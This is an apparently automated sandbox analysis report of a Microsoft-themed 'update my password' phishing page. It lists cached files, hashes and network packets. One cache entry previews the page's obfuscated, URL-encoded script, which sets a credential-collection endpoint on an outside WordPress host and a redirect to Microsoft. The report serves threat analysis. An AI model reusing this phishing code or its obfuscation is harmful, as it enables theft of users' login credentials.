Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, aadcdn.msauth.net, wu-bg-shim.trafficmanager.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

Chrome Cache Entry: 47

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
Category:	downloaded
Size (bytes):	673
Entropy (8bit):	7.6596900876595075
Encrypted:	false
SSDEEP:	12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
MD5:	0E176276362B94279A4492511BFCBD98
SHA1:	389FE6B51F62254BB98939896B8C89EBEFFE2A02
SHA-256:	9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
SHA-512:	8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
Malicious:	false
Reputation:	low
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
Preview:	...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q.....~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1......#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

Chrome Cache Entry: 48

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	low
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 49

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	915
Entropy (8bit):	3.8525277758130154
Encrypted:	false
SSDEEP:	24:t4CvnAVRfFArf1QqCSzGUdiHTVtpRduf1QqCWbVHTVeUV0Uv6f1QqCWbVHTVeUVx:fn1r1QqC4GuiHFXS1QqCWRHQ3V1QqCWz
MD5:	2B5D393DB04A5E6E1F739CB266E65B4C
SHA1:	6A435DF5CAC3D58CCAD655FE022CCF3DD4B9B721
SHA-256:	16C3F6531D0FA5B4D16E82ABF066233B2A9F284C068C663699313C09F5E8D6E6
SHA-512:	3A692635EE8EBD7B15930E78D9E7E808E48C7ED3ED79003B8CA6F9290FA0E2B0FA3573409001489C00FB41D5710E75D17C3C4D65D26F9665849FB7406562A406
Malicious:	false
Reputation:	low
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path fill="#777777" d="M1.143,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.107,1.107,0,0,1-.446.089A1.107,1.107,0,0,1,.7,9.054a1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893A1.164,1.164,0,0,1,.7,6.946a1.107,1.107,0,0,1,.446-.089M8,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,8,6.857m6.857,0a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,14.857,6.857Z"/></svg>

Chrome Cache Entry: 50

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (61112)
Category:	downloaded
Size (bytes):	102041
Entropy (8bit):	5.301013942919482
Encrypted:	false
SSDEEP:	1536:IpHDgWeWJw+k4zazA/PWrF7qvEAFiQcpmeh1+zy35o:ORUyy3+
MD5:	53B33B15CF9DFF288EDA12099E0EE746
SHA1:	1748B7BD3B89B84D800374083AF646FEC11FF082
SHA-256:	30C90EA15DDEEC7D675ED3EAAF26E8283B908265C5A6A5FF00345D03C24233F0
SHA-512:	8BA4BCBE63B72E6DFF001B441D0FE100ECB3A6A6D664816EAC7D89E8BB088C6653C9F7BC646F20884842C19C7516ED751332E4585FF49202D4B3F73E6438F24D
Malicious:	false
Reputation:	low
URL:	https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/Converged_v21033_U7M7Fc-d_yiO2hIJng7nRg2.css
Preview:	/! Copyright (C) Microsoft Corporation. All rights reserved. /./*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise...//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 Twitter, Inc..Permission is hereby granted, free of charge, to any perso

Chrome Cache Entry: 51

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	28
Entropy (8bit):	4.164497779200461
Encrypted:	false
SSDEEP:	3:6ATunSkks:uSBs
MD5:	17C4BD96DCB397D1D62D24921BC4FEBA
SHA1:	2C0F2AFF858069D582A97867B183EBD5DC8A9FCB
SHA-256:	3549DBC06BDD994A38C9A29AECD7E8F9577E2150D15F8D6B0533B4D250666514
SHA-512:	9659C4D5B7EF0C852428D3AE8A8EE816438E268E4537FFA70823C9CB2C240252E6D9E863B2AE95F39397172EEFAAA73541123DC9255C9B37FC9437C655F55A78
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwn4flUyE1eUBBIFDU9-u70SBQ1Xevf9?alt=proto
Preview:	ChIKBw1Pfru9GgAKBw1Xevf9GgA=

Chrome Cache Entry: 52

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
Category:	dropped
Size (bytes):	673
Entropy (8bit):	7.6596900876595075
Encrypted:	false
SSDEEP:	12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
MD5:	0E176276362B94279A4492511BFCBD98
SHA1:	389FE6B51F62254BB98939896B8C89EBEFFE2A02
SHA-256:	9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
SHA-512:	8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
Malicious:	false
Reputation:	low
Preview:	...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q.....~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1......#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

Chrome Cache Entry: 53

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (58332), with CRLF line terminators
Category:	downloaded
Size (bytes):	58378
Entropy (8bit):	3.2433705016502667
Encrypted:	false
SSDEEP:	384:PLpWxhyvUvO+nNxGjVNN0kfGgy9/DEAtsOa5OLJCr1WOLuPlROH0a9LVoLyFSHr+:P/vKEXSkOWU+iVFU
MD5:	EFAE4A6C9F8DBEFED2CB02604EE0B859
SHA1:	6C81BA61C125A197385B339E9AA683CF86375F7A
SHA-256:	5040112F6EF2F76F38444B7935FBE3E6503BFB945AA6C9E6D8B54B7F37CA288E
SHA-512:	6A0AA470198B4815ECCBD81BB31FC7ECD081422D586EF365BE4C34A850745F89EC3CE917A70B2B317562F481AB790726378DC544770F909BE81561A2A587FD62
Malicious:	false
Reputation:	low
URL:	https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html
Preview:	.<script language="javascript">..document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%3E%3C%68%74%6D%6C%3E%3C%68%65%61%64%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%20%20%20%20%6C%65%74%20%6D%61%69%6E%5F%65%6D%61%69%6C%5F%74%6F%20%3D%20%22%22%3B%0A%20%20%20%20%20%20%20%20%6C%65%74%20%72%65%64%69%72%65%63%74%5F%6C%69%6E%6B%20%3D%20%22%68%74%74%70%73%3A%2F%2F%61%64%6D%69%6E%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D%2F%22%0A%20%20%20%20%20%20%20%20%6C%65%74%20%53%63%72%69%70%74%5F%6C%69%6E%6B%3D%20%22%68%74%74%70%73%3A%2F%2F%66%75%73%69%6F%6E%68%65%69%67%68%74%73%2E%63%6F%6D%2F%77%70%2D%69%6E%63%6C%75%64%65%73%2F%6E%61%6D%65%2F%64%66%2E%70%68%70%22%3B%0A%20%20%20%20%20%20%20%20%6C%65%74%20%72%65%73%75%6C%74%5F%70%72%6F%76%69%64%65%72%20%3D%20%22%4D%69%63%72%6F%73%6F%66%74%20%4F%75%74%6C%6F%6F%6B%22%3B%0A%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0A%09%3C%21%44%4F%43%54%59%50%45%20%68%74%6D%6C%3E%3C%68%74%6D%6C%3E%3C%68%65%61%64%3E%3C%6D%65%74%61%20%68%74%74%7

Chrome Cache Entry: 54

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	3651
Entropy (8bit):	4.094801914706141
Encrypted:	false
SSDEEP:	96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
MD5:	EE5C8D9FB6248C938FD0DC19370E90BD
SHA1:	D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256:	04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512:	C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious:	false
Reputation:	low
URL:	https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

Chrome Cache Entry: 55

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	3651
Entropy (8bit):	4.094801914706141
Encrypted:	false
SSDEEP:	96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
MD5:	EE5C8D9FB6248C938FD0DC19370E90BD
SHA1:	D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256:	04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512:	C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious:	false
Reputation:	low
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

Chrome Cache Entry: 56

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	915
Entropy (8bit):	3.8525277758130154
Encrypted:	false
SSDEEP:	24:t4CvnAVRfFArf1QqCSzGUdiHTVtpRduf1QqCWbVHTVeUV0Uv6f1QqCWbVHTVeUVx:fn1r1QqC4GuiHFXS1QqCWRHQ3V1QqCWz
MD5:	2B5D393DB04A5E6E1F739CB266E65B4C
SHA1:	6A435DF5CAC3D58CCAD655FE022CCF3DD4B9B721
SHA-256:	16C3F6531D0FA5B4D16E82ABF066233B2A9F284C068C663699313C09F5E8D6E6
SHA-512:	3A692635EE8EBD7B15930E78D9E7E808E48C7ED3ED79003B8CA6F9290FA0E2B0FA3573409001489C00FB41D5710E75D17C3C4D65D26F9665849FB7406562A406
Malicious:	false
Reputation:	low
URL:	https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path fill="#777777" d="M1.143,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.107,1.107,0,0,1-.446.089A1.107,1.107,0,0,1,.7,9.054a1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893A1.164,1.164,0,0,1,.7,6.946a1.107,1.107,0,0,1,.446-.089M8,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,8,6.857m6.857,0a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,14.857,6.857Z"/></svg>

Chrome Cache Entry: 57

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	low
URL:	https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/favicon.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 58

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	240
Entropy (8bit):	6.583238701216054
Encrypted:	false
SSDEEP:	6:6v/lhPZJkta+R80rWRNtlQQz6fl4sfiadl/jp:6v/77t5NJIlhfL/N
MD5:	7CC096DA6AA2DBA3F81FCC1C8262157C
SHA1:	A50776316F0220ED7CD7882A68C742A8861C999D
SHA-256:	AB50358475ADAE73A435466C72D1A48AB124E8AE06614663716A46DCE5AC8B83
SHA-512:	EC046758EC2D6588B9B103E5BB1B035DEE57DFBB068AD902C869ED22B14F78282461709BDB20366EE887B814F00AE39A4EBD82DB42BD831BE85FE5B4BF4037AF
Malicious:	false
Reputation:	low
URL:	https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png
Preview:	.PNG........IHDR..............w=.....pHYs...........~.....IDATH....@.......: !D.%.@%..>(...4@FHND.Gj.l.'.I ....h?.&.D.......$...R.z.....`.........#...a..8@3.z.=...3X...X.L.;....v`.....p.t..DI&w.I.pA&9..F........Z.FG<&.:9.....IEND.B`.

Chrome Cache Entry: 59

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	240
Entropy (8bit):	6.583238701216054
Encrypted:	false
SSDEEP:	6:6v/lhPZJkta+R80rWRNtlQQz6fl4sfiadl/jp:6v/77t5NJIlhfL/N
MD5:	7CC096DA6AA2DBA3F81FCC1C8262157C
SHA1:	A50776316F0220ED7CD7882A68C742A8861C999D
SHA-256:	AB50358475ADAE73A435466C72D1A48AB124E8AE06614663716A46DCE5AC8B83
SHA-512:	EC046758EC2D6588B9B103E5BB1B035DEE57DFBB068AD902C869ED22B14F78282461709BDB20366EE887B814F00AE39A4EBD82DB42BD831BE85FE5B4BF4037AF
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR..............w=.....pHYs...........~.....IDATH....@.......: !D.%.@%..>(...4@FHND.Gj.l.'.I ....h?.&.D.......$...R.z.....`.........#...a..8@3.z.=...3X...X.L.;....v`.....p.t..DI&w.I.pA&9..F........Z.FG<&.:9.....IEND.B`.

Chrome Cache Entry: 60

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65451)
Category:	downloaded
Size (bytes):	89493
Entropy (8bit):	5.289599913770796
Encrypted:	false
SSDEEP:	1536:YjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h5cApwEjOPrBeU6QLiTFbc0QlQvakF:YYh8eip3hXuf6IidlrvakdtQ47GK1
MD5:	12108007906290015100837A6A61E9F4
SHA1:	1D6AE46F2FFA213DEDE37A521B011EC1CD8D1AD3
SHA-256:	C4DCCDD9AE25B64078E0C73F273DE94F8894D5C99E4741645ECE29AEEFC9C5A4
SHA-512:	93658F3EB4A044523A7136871E125D73C9005DA44CE09045103A35A4F18695888ECAFE2F9C0D0FA741B95CC618C6000F9AD9AFFC821A400EA7E5F2C0C8968530
Malicious:	false
Reputation:	low
URL:	https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js
Preview:	/! jQuery v3.5.0 \| (c) JS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o

Static File Info

⊘No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 18, 2024 01:23:03.697830915 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 18, 2024 01:23:13.305847883 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 18, 2024 01:23:14.152422905 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.152503014 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.152734995 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.152755022 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.152827024 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.152910948 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.153274059 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.153307915 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.153534889 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.153614998 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.376163006 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.376508951 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.376585960 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.377574921 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.377782106 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.378891945 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.378984928 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.379101038 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.379117966 CEST	443	49735	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.383383989 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.383641958 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.383697033 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.385361910 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.385452032 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.386745930 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.386838913 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:14.420371056 CEST	49735	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.435692072 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:14.435709953 CEST	443	49736	104.18.3.35	192.168.2.4
